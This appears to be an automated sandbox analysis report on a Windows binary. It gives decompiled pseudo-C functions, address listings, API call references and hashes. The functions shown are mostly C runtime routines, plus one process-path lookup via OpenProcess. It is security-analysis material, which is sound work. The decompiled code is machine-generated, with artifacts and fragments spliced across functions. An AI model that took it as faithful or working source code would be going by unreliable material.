                                            0x00401ae0
                                            0x00000000
                                            0x00000000
                                            0x00401ae0
                                            0x00000000
                                            0x00401a0e
                                            0x00401af4

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,?), ref: 00401A84
                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00401A97
                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00401930,00000000,?,?,?,00000000,00000000), ref: 00401AA2
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00401930,00000000,?,?,?,00000000,00000000), ref: 00401AAB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 3360349984-0
                                            • Opcode ID: cb7029f9d71a241264b81462157cc7e38f178d4c33cb10351b11730bcfde7c0a
                                            • Instruction ID: a6fde5db8c1225693a093a7d6e70488901c13f74abad16c9666412542328f865
                                            • Opcode Fuzzy Hash: cb7029f9d71a241264b81462157cc7e38f178d4c33cb10351b11730bcfde7c0a
                                            • Instruction Fuzzy Hash: 39414D71A00219AFCF11EBA5CC959FFBBB9AF44324F04056EF412B32E1DB3869058B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00434A7A, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00434A7A(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4604c4; // 0x0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004368EF(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00437795(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0043D52F();
									E00437795(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                            0x00434a7a
                                            0x00434a7d
                                            0x00434a85
                                            0x00434a8e
                                            0x00434ae3
                                            0x00434a9c
                                            0x00434aa2
                                            0x00434aa6
                                            0x00434af4
                                            0x00434af4
                                            0x00434aa8
                                            0x00434ab0
                                            0x00434ab3
                                            0x00434ab6
                                            0x00434aed
                                            0x00434aee
                                            0x00000000
                                            0x00434ab8
                                            0x00434ac2
                                            0x00434ace
                                            0x00000000
                                            0x00434ad0
                                            0x00434ad0
                                            0x00434ad1
                                            0x00434ad2
                                            0x00434ad8
                                            0x00434add
                                            0x00434ae0
                                            0x00000000
                                            0x00434ae0
                                            0x00434ace
                                            0x00434ab6
                                            0x00434ae9
                                            0x00434aec
                                            0x00000000
                                            0x00434aec
                                            0x00434ae7
                                            0x00000000
                                            0x00434a87
                                            0x00434a8b
                                            0x00434a8b
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0818d73b44fd564c29b3646c2a0e6aba9ca007ec29bddad3b07198720be1e91
                                            • Instruction ID: 9700076cee2517303e7398c762f73d94f0342d61bc731878c65fea14d5e7c808
                                            • Opcode Fuzzy Hash: b0818d73b44fd564c29b3646c2a0e6aba9ca007ec29bddad3b07198720be1e91
                                            • Instruction Fuzzy Hash: AB01F7B22496163EEB2076B96CC0FA7220DDBC93BCF30232BB130512C1EB789D40412C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00434AF9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00434AF9(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4604c0; // 0x47b508
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004368EF(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00437795(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0043D53A(_t13);
									E00437795(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                            0x00434af9
                                            0x00434afc
                                            0x00434b04
                                            0x00434b0d
                                            0x00434b5c
                                            0x00434b19
                                            0x00434b1f
                                            0x00434b23
                                            0x00434b6d
                                            0x00434b6d
                                            0x00434b25
                                            0x00434b2d
                                            0x00434b30
                                            0x00434b33
                                            0x00434b66
                                            0x00434b67
                                            0x00000000
                                            0x00434b35
                                            0x00434b3b
                                            0x00434b47
                                            0x00000000
                                            0x00434b49
                                            0x00434b49
                                            0x00434b4a
                                            0x00434b4b
                                            0x00434b51
                                            0x00434b56
                                            0x00434b59
                                            0x00000000
                                            0x00434b59
                                            0x00434b47
                                            0x00434b33
                                            0x00434b62
                                            0x00434b65
                                            0x00000000
                                            0x00434b65
                                            0x00434b60
                                            0x00000000
                                            0x00434b06
                                            0x00434b0a
                                            0x00434b0a
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa3b50c2b09b8f570b8ec8e2ec4bfab65e0c5398178c4f88c7e7c99693315da5
                                            • Instruction ID: ab6629c192f497bedbd73a7d6ccd773d66e9f7ba8411b708e7663768e512849f
                                            • Opcode Fuzzy Hash: aa3b50c2b09b8f570b8ec8e2ec4bfab65e0c5398178c4f88c7e7c99693315da5
                                            • Instruction Fuzzy Hash: 8E01A7B29092157AB7602A786CC0E97A31DEBC93B8B24236BB121512D1EB6CEC015168
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00437DA3, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00437DA3(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x460648 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x44e5c0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8d941b68
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                            0x00437da8
                                            0x00437dac
                                            0x00437db3
                                            0x00437db7
                                            0x00437dc5
                                            0x00437ddb
                                            0x00437ddf
                                            0x00437e08
                                            0x00437e0a
                                            0x00437e0e
                                            0x00437e11
                                            0x00437e11
                                            0x00437e17
                                            0x00437e19
                                            0x00000000
                                            0x00437e1a
                                            0x00437de1
                                            0x00437dea
                                            0x00437df9
                                            0x00437dec
                                            0x00437def
                                            0x00437df5
                                            0x00437df5
                                            0x00437dfd
                                            0x00000000
                                            0x00437dff
                                            0x00437e02
                                            0x00437e04
                                            0x00000000
                                            0x00437e04
                                            0x00437dfd
                                            0x00437db9
                                            0x00437dbe
                                            0x00000000

                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00437D4A,00000000,00000000,00000000,00000000,?,00438076,00000006,FlsSetValue), ref: 00437DD5
                                            • GetLastError.KERNEL32(?,00437D4A,00000000,00000000,00000000,00000000,?,00438076,00000006,FlsSetValue,0044EAB0,0044EAB8,00000000,00000364,?,00438E33), ref: 00437DE1
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00437D4A,00000000,00000000,00000000,00000000,?,00438076,00000006,FlsSetValue,0044EAB0,0044EAB8,00000000), ref: 00437DEF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID:
                                            • API String ID: 3177248105-0
                                            • Opcode ID: 2cd115d6dfb36b5e3de9a363de08d7244158cc9f2dcf7fbff3043b0fa6e9e2a7
                                            • Instruction ID: a40c7f547cb27535d59b1987c11a0a8772af27284bfa5a697d710d06250ff8be
                                            • Opcode Fuzzy Hash: 2cd115d6dfb36b5e3de9a363de08d7244158cc9f2dcf7fbff3043b0fa6e9e2a7
                                            • Instruction Fuzzy Hash: 2B012B76609223ABC7314B79EC46A673BD8EF4ABA0F200A75F956D3240D724DC11D6E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042C4DE, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 19%
                                            			E0042C4DE(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E0042CB2D(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0042BA8D(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E0042CD2F(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0042C2E8(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0042BA5B(_t25, _t30);
					return _t25;
				}
				return _t25;
			}













                                            0x0042c4de
                                            0x0042c4de
                                            0x0042c4e1
                                            0x0042c4e6
                                            0x0042c4e9
                                            0x0042c4eb
                                            0x0042c4ee
                                            0x0042c4f1
                                            0x0042c4f2
                                            0x0042c4f5
                                            0x0042c4fa
                                            0x0042c4fa
                                            0x0042c4fd
                                            0x0042c501
                                            0x0042c504
                                            0x0042c509
                                            0x0042c506
                                            0x0042c506
                                            0x0042c506
                                            0x0042c50c
                                            0x0042c512
                                            0x0042c515
                                            0x0042c517
                                            0x0042c51a
                                            0x0042c51d
                                            0x0042c51e
                                            0x0042c527
                                            0x0042c52c
                                            0x0042c52f
                                            0x0042c535
                                            0x0042c538
                                            0x0042c53b
                                            0x0042c53e
                                            0x0042c53f
                                            0x0042c542
                                            0x0042c54d
                                            0x0042c551
                                            0x00000000
                                            0x0042c551
                                            0x0042c558

                                            APIs
                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0042C4F5
                                              • Part of subcall function 0042CB2D: ___AdjustPointer.LIBCMT ref: 0042CB77
                                            • _UnwindNestedFrames.LIBCMT ref: 0042C50C
                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 0042C51E
                                            • CallCatchBlock.LIBVCRUNTIME ref: 0042C542
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: 6a7b41a67f6b5d6162d44e2b17d28e3b82f582da003bb732735d339659016d48
                                            • Instruction ID: 2c12331c66c6fbc8f43a277f8a41df2e328e76dff3e8d7231c4f2e002bf8187a
                                            • Opcode Fuzzy Hash: 6a7b41a67f6b5d6162d44e2b17d28e3b82f582da003bb732735d339659016d48
                                            • Instruction Fuzzy Hash: 3E015B32100118BBCF126F55EC41EDF3BA6EF48754F40801AF90861120C73AE8A1DBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00411392, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000), ref: 004113A7
                                            • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208,?,00000000), ref: 004113C9
                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004113D4
                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004113DC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$FileModuleNameOpenProcess
                                            • String ID:
                                            • API String ID: 3706008839-0
                                            • Opcode ID: aeb3277b1082d6890124708f991b15fab596539a832ca6fe13f0954de95579b7
                                            • Instruction ID: 68307a6d377afbe10be92355077e2df87fbfc843d3d01afa9c74e8ffd1f19f1b
                                            • Opcode Fuzzy Hash: aeb3277b1082d6890124708f991b15fab596539a832ca6fe13f0954de95579b7
                                            • Instruction Fuzzy Hash: 18F0E93534031967E72057645C0DFBB366C9B85B12F1002B6FE15D6194EFA49D42479E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042B1E3, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042B1E3() {
				void* _t4;
				void* _t8;

				E0042E70E();
				E0042B628();
				if(E0042E965() != 0) {
					_t4 = E0042E917(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0042E9A1();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                            0x0042b1e3
                                            0x0042b1e8
                                            0x0042b1f4
                                            0x0042b1f9
                                            0x0042b1fe
                                            0x0042b200
                                            0x0042b20b
                                            0x0042b202
                                            0x0042b202
                                            0x00000000
                                            0x0042b202
                                            0x0042b1f6
                                            0x0042b1f6
                                            0x0042b1f8
                                            0x0042b1f8

                                            APIs
                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0042B1E3
                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0042B1E8
                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0042B1ED
                                              • Part of subcall function 0042E965: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0042E976
                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0042B202
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                            • String ID:
                                            • API String ID: 1761009282-0
                                            • Opcode ID: c8cab996523d6160cd0231d1ae561d2e80bd2ae29d8f31321c51e7a852f05bda
                                            • Instruction ID: a1a0940aa554e67b8481579287141760533e896e20e6bce6b6523602b7574e1e
                                            • Opcode Fuzzy Hash: c8cab996523d6160cd0231d1ae561d2e80bd2ae29d8f31321c51e7a852f05bda
                                            • Instruction Fuzzy Hash: 81C04C85304331501D9036BB36161BE03009CA33CCBC018CBED51272079F4E485AA5BF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043758D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 0043761D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 19ad6a5e3fe015b3da44294cfd696e0f6c0a845e58e98b84473d7ab010a14584
                                            • Instruction ID: 28282971132814be98920e89fc0a0f10cbd082e9f90944222508a46bd18ee6fa
                                            • Opcode Fuzzy Hash: 19ad6a5e3fe015b3da44294cfd696e0f6c0a845e58e98b84473d7ab010a14584
                                            • Instruction Fuzzy Hash: 655189E1A0C60296E7317718CB1236B2B949B44760FB0586BF4D5513EAEF7C8C819A4F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043C159, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0043C159(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00434715(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0044598B(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00430CA7();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E004368EF(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0044598B(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0043C528(_a12, __eflags, _t213);
													E00437795(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0044598B(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00430CA7();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x45f014; // 0x8d941b67
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E004459E0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0042B710(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00445540(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0043C141);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
